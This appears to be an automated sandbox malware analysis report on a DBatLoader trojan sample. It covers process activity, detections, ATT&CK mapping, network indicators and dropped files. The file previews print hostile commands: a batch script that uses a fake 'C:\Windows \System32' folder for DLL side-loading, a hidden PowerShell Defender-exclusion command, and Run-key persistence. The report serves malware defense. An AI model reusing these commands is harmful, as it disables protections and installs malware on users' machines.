                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 400000
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 232008
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D69760
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D698F0
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFMemory written: C:\Users\Public\Libraries\flhgywjG.bat base: 77D6AEF0
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeProcess created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /YJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                  Source: C:\Users\Public\Libraries\Gjwyghlf.PIFProcess created: C:\Users\Public\Libraries\flhgywjG.bat C:\Users\Public\Libraries\flhgywjG.bat
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerO
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ
                  Source: flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@(
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
                  Source: flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager76\0
                  Source: flhgywjG.bat, 00000011.00000002.1053880782.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager~
                  Source: flhgywjG.bat, 00000011.00000002.1053964949.0000000000741000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.17.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02855A90
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02855B9C
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: GetLocaleInfoA,0_2_0285A7A8
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: GetLocaleInfoA,0_2_0285A7F4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_028591F0 GetLocalTime,0_2_028591F0
                  Source: C:\Users\user\Desktop\tTIYCp2sf4.exeCode function: 0_2_0285B770 GetVersionExA,0_2_0285B770

                  Stealing of Sensitive Information

Source: Yara match; File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: 1 Scripting; 1 Native API; 1 Shared Modules; 1 PowerShell; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic
Persistence: 11 DLL Side-Loading; 1 Valid Accounts; 1 Registry Run Keys / Startup Folder; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Privilege Escalation: 11 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 412 Process Injection; 1 Registry Run Keys / Startup Folder; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Scripting; 2 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 11 DLL Side-Loading; 1 File Deletion; 231 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 21 Virtualization/Sandbox Evasion; 412 Process Injection
Credential Access: 1 Credential API Hooking; 111 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 24 System Information Discovery; 11 Security Software Discovery; 2 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 Remote System Discovery; 1 System Network Configuration Discovery; Process Discovery; Permission Groups Discovery; Local Groups; Domain Groups
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM; Exploitation of Remote Services
Collection: 11 Archive Collected Data; 1 Credential API Hooking; 111 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

Behavior Graph (image omitted): ID: 1285850, Sample: tTIYCp2sf4.exe, Startdate: 04/08/2023, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
tTIYCp2sf4.exe | 48% | Virustotal |
tTIYCp2sf4.exe | 55% | ReversingLabs | Win32.Trojan.Zusy
tTIYCp2sf4.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Windows \System32\netutils.dll | 100% | Avira | TR/Starter.glbyt
C:\Users\Public\Libraries\netutils.dll | 100% | Avira | TR/Starter.glbyt
C:\Users\Public\Libraries\Gjwyghlf.PIF | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Gjwyghlf.PIF | 55% | ReversingLabs | Win32.Trojan.Zusy
C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs |
C:\Users\Public\Libraries\flhgywjG.bat | 4% | ReversingLabs |
C:\Users\Public\Libraries\netutils.dll | 83% | ReversingLabs | Win64.Trojan.Barys
C:\Windows \System32\easinvoker.exe | 0% | ReversingLabs |
C:\Windows \System32\netutils.dll | 83% | ReversingLabs | Win64.Trojan.Barys

No Antivirus matches

Source | Detection | Scanner | Label
geoplugin.net | 1% | Virustotal |

Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
www.binccoco.com | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpUse | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpA | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpV | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpu | 0% | Avira URL Cloud | safe
http://www.pmail.com0 | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.binccoco.com | 23.172.112.72 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
onedrive.live.com | unknown | unknown | false | | high
ayhtnw.dm.files.1drv.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
www.binccoco.com | true | Avira URL Cloud: safe | unknown
https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
23.172.112.72 | www.binccoco.com | Reserved | 396502 | HOTSPOTPRUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false

IP
127.0.0.1

                                                        Joe Sandbox Version:38.0.0 Beryl
                                                        Analysis ID:1285850
                                                        Start date and time:2023-08-04 18:13:05 +02:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 32s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample file name:tTIYCp2sf4.exe
                                                        Original Sample Name:cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@36/19@8/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HDC Information:
                                                        • Successful, ratio: 58.3% (good quality ratio 56.9%)
                                                        • Quality average: 79.7%
                                                        • Quality standard deviation: 24.8%
                                                        HCA Information:
                                                        • Successful, ratio: 84%
                                                        • Number of executed functions: 32
                                                        • Number of non-executed functions: 36
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240s for powershell
                                                        • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe, WmiPrvSE.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                                                        • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.

Time | Type | Description
18:13:57 | API Interceptor | 1x Sleep call for process: tTIYCp2sf4.exe modified
18:14:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf C:\Users\Public\Gjwyghlf.url
18:14:06 | API Interceptor | 21x Sleep call for process: powershell.exe modified
18:14:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf C:\Users\Public\Gjwyghlf.url
18:14:12 | API Interceptor | 2x Sleep call for process: Gjwyghlf.PIF modified
                                                                                                Process:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):234
                                                                                                Entropy (8bit):3.364956253410265
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:rmlql+pfyfOlcFi5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:KlHwGlcc5YcIeeDAlS1gWAAe5q1gWAv
                                                                                                MD5:E77FA7ABCBA4DA4E126A46A533C523A7
                                                                                                SHA1:31A25A1BCD950052BB6000719ED88531905391B2
                                                                                                SHA-256:945F91A37A34D2ECD2CD394F55D1A6AE16D9C640D81C6F84254916898945D65D
                                                                                                SHA-512:60CDB6AFDACA950F6597D3AF79B1296C723EA56D4F963FD200239A21344A51620F41F77CED884C545399AD0CFD68606241E579364B710F003944DC85B9B5B6B2
                                                                                                Malicious:false
                                                                                                Preview:....[.2.0.2.3./.0.8./.0.4. .1.8.:.1.4.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Gjwyghlf.PIF">), ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):100
                                                                                                Entropy (8bit):5.117404160633784
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsmCIvsb6U+K9Pv:HRYFVmTWDyzPmCSE/bPv
                                                                                                MD5:FA7F86C5F406841A82B2854722F8736B
                                                                                                SHA1:F6003A979BD154F098247706E9338150B0AF58B0
                                                                                                SHA-256:6C369171A61BA9D39731624F799A5EFD594197FA152E9F4369E0AAA91E9C9A02
                                                                                                SHA-512:2084E0A725F2DC2704C4241774B6DF45D76B72A059AF96BF5001407FF75CD5B7C96B1C0E99EBDEA46A5E3CE28EBFD36054066CCFC7CC29975010BF858C04F63C
                                                                                                Malicious:false
                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Gjwyghlf.PIF"..IconIndex=21..HotKey=18..
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1113600
                                                                                                Entropy (8bit):7.278512693308651
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:+GBEKQCWCWF4bH7yT+YLWPP7/NCo6LboxSYVuDpa7Dfavrjnpi0JN:rDpd7/NC3LRYwNa7mvrjJ
                                                                                                MD5:AE5AD2EFD8A9CF25AD9EB00EBE24EB92
                                                                                                SHA1:2EEE8F21D06A2602ED0CD3E5DC3A8A0DEA8157D1
                                                                                                SHA-256:CF39A14A2DC1FE5AA487B6FAF19C63BC97103DB670FA24C62832895E3002ECA2
                                                                                                SHA-512:983E6138EA90D1AAD8963E4441218E644B4829336561D5C40E5AFDADC869FFD9CCF9434260BDE1EF3858E8D73616945E01E5306EB8A1023772CAFBF4066DD830
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...........k.......p....@..............................................@........................... ..`+...........................p..(q...........................`.......................(...............................text....!.......".................. ..`.itext...,...@.......&.............. ..`.data....o...p...p...T..............@....bss.....6...............................idata..`+... ...,..................@....tls....4....P...........................rdata.......`......................@..@.reloc..(q...p...r..................@..B.rsrc................d..............@..@....................................@..@................................................................................................
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):411
                                                                                                Entropy (8bit):5.1037932688089676
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:tPUx2cL4r0/T2cLZ9PULT2cLZ9LhGKFIs2cLZZi2cL9aXSLp6N2cLAP2cL4nz/:tPhn0is8L6sVGeWkVPS93tOf
                                                                                                MD5:55ABA243E88F6A6813C117FFE1FA5979
                                                                                                SHA1:210B9B028A4B798C837A182321DBF2E50D112816
                                                                                                SHA-256:5A11C5641C476891AA30E7ECFA57C2639F6827D8640061F73E9AFEC0ADBBD7D2
                                                                                                SHA-512:68009C4C9BBEA75A3BFA9F79945D30957A95691EA405D031B4CA7F1CB47504BBC768FCAE59173885743AD4D6CFDD2313C3FE0ACB515E34E5C809ECDC7F45E307
                                                                                                Malicious:false
                                                                                                Preview:mkdir "\\?\C:\Windows " ..mkdir "\\?\C:\Windows \System32"..ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y..ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y..ECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y.."C:\Windows \System32\easinvoker.exe"..ping 127.0.0.1 -n 6 > nul..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..exit..
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):155
                                                                                                Entropy (8bit):4.687076340713226
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                                                                                MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                                                                                SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                                                                                SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                                                                                SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                                                                                Malicious:false
                                                                                                Preview:start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4
                                                                                                Entropy (8bit):2.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:gy:gy
                                                                                                MD5:864B153879FD1B48A69B1696349100DF
                                                                                                SHA1:7C2130011AB48A0997571F4AF3C3534159031F04
                                                                                                SHA-256:D5F0EB6A8671AEC1295E01DCBAE8B70BBDBECE3BF94DAC0271185EA19C9E2F78
